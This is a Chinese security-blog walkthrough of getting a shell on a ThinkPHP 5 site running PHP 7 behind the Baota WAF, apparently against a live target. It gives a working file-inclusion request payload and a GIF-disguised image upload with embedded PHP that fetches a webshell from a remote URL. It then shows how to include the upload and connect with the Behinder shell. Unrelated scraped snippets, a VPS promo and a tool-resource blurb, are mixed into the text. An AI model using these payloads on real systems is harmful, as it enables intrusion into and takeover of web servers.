【奇思淫技】TP5最新getshell漏洞

释放双眼,带上耳机,听听看~!

Digitalocean羊毛党的胜利

本文作者:Alex(MS08067核心成员) 前言        这次给大家介绍一下Digitalocean这个机房,他家的VPS测评可以百度搜搜看,我这里说一下重点。 移动和电信线路不错(尤其是移动),联通就很差了250-300ms的延迟,不过好在不丢包。 不能做大规模的扫描和发包,

ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。

0X00 基本环境

确定目标存在tp5的漏洞,经过后期的探测发现安装有宝塔WAF。

基本环境为:php7 + 宝塔waf

因为php7之后基本确定舍弃了函数assert(),因此有关于assert的所有payload全部失效!!!
虽然网上有很多关于tp5+php7的文章,但是我尝试之后全部失败。

0x01 另辟蹊径

因为之前payload所显示的phpinfo不全,那我们换一种方式!

得出关键信息:

disable_functions:

passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru


得出关键信息:

网站绝对路径:/www/wwwroot/site

过程不多说!老规矩!

文件包含,payload:
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/www/wwwroot/site/public/robots.txt


正好找到了该站的编辑器。(ueditor默认路径)
那么我们现在只需要构造包含内容即可。

GIF98a
<?php phpinfo(); ?>
<?php copy("http://url/shell.txt","test.php");?>

添加phpinfo是为了看代码是否正确的执行了,但如果你有自信认为一定成功,那随意。

上传图片,得到路径。

【福利包】安全工具教程资源汇总

团队核心a-running-snail喜欢研究各类渗透原理,为此整理了归纳了很多实用的知识链接,方向为web安全、内网渗透、应急响应等,准备陆续分享给大家,今天分享一些安全工具教程资源。  Metasploit工具教程 MSF渗透框架下载:https://www.metasploit.com/ winx64


继续。

payload:

_method=__construct&filter[]=think\__include_file&get[]=/www/wwwroot/site/public/upload/20190322/c627cb130d82cb2f9c5bf4575850cf79.jpg&method=get&server[]=

注意:路径一定要正确!!!

冰蝎连接shell。

收工。

作者:曲云杰


来源:Ms08067安全实验室


往期回顾


1.《Web安全攻防》配套视频之SQLMAP详解(1)

2.《Web安全攻防》配套视频之SQLMAP详解(2)

3.《Web安全攻防》配套视频之XSS实验平台搭建

界世的你当

作你的肩膀



 ms08067安全实验室

本文源自微信公众号:Ms08067安全实验室

《Web安全攻防》配套视频之Burp Suite入门与进阶

《Web安全攻防-渗透测试实战指南》配套视频 第七期 本期视频内容对应图书 第3章 常用的渗透测试工具 3.2 Burp Suite详解 3.2.2 Burp Suite 入门 3.2.3 Burp Suite 进阶 如果学习有疑问, 可以登录官网: https://www.ms08067.com 书籍介绍 《Web安全攻防-渗透

人已赞赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新消息 消息中心
有新私信 私信列表
搜索